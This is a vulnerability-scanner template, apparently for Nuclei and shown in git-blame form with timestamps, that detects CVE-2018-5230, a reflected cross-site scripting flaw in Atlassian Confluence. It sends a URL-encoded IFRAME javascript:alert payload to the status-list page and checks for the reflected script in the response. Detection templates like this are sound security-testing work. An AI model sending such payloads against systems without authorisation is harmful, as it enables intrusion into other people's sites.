2021-01-02 05:00:39 +00:00
|
|
|
id: CVE-2018-5230
|
2020-04-08 11:25:25 +00:00
|
|
|
|
|
|
|
info:
|
|
|
|
name: Atlassian Confluence Status-List XSS
|
|
|
|
author: madrobot
|
2020-05-25 07:49:06 +00:00
|
|
|
severity: medium
|
2021-02-05 19:44:41 +00:00
|
|
|
tags: cve,cve2018,atlassian,confluence,xss
|
2020-04-08 11:25:25 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/pages/includes/status-list-mo%3CIFRAME%20SRC%3D%22javascript%3Aalert%281337%29%22%3E.vm"
|
2020-07-08 11:38:57 +00:00
|
|
|
matchers-condition: and
|
2020-04-08 11:25:25 +00:00
|
|
|
matchers:
|
|
|
|
- type: status
|
|
|
|
status:
|
2020-05-25 07:49:06 +00:00
|
|
|
- 200
|
2020-04-08 13:16:19 +00:00
|
|
|
- type: word
|
2020-04-08 13:24:03 +00:00
|
|
|
words:
|
2020-07-10 20:38:48 +00:00
|
|
|
- "SRC=\"javascript:alert(1337)\">"
|
2020-04-08 11:25:25 +00:00
|
|
|
part: body
|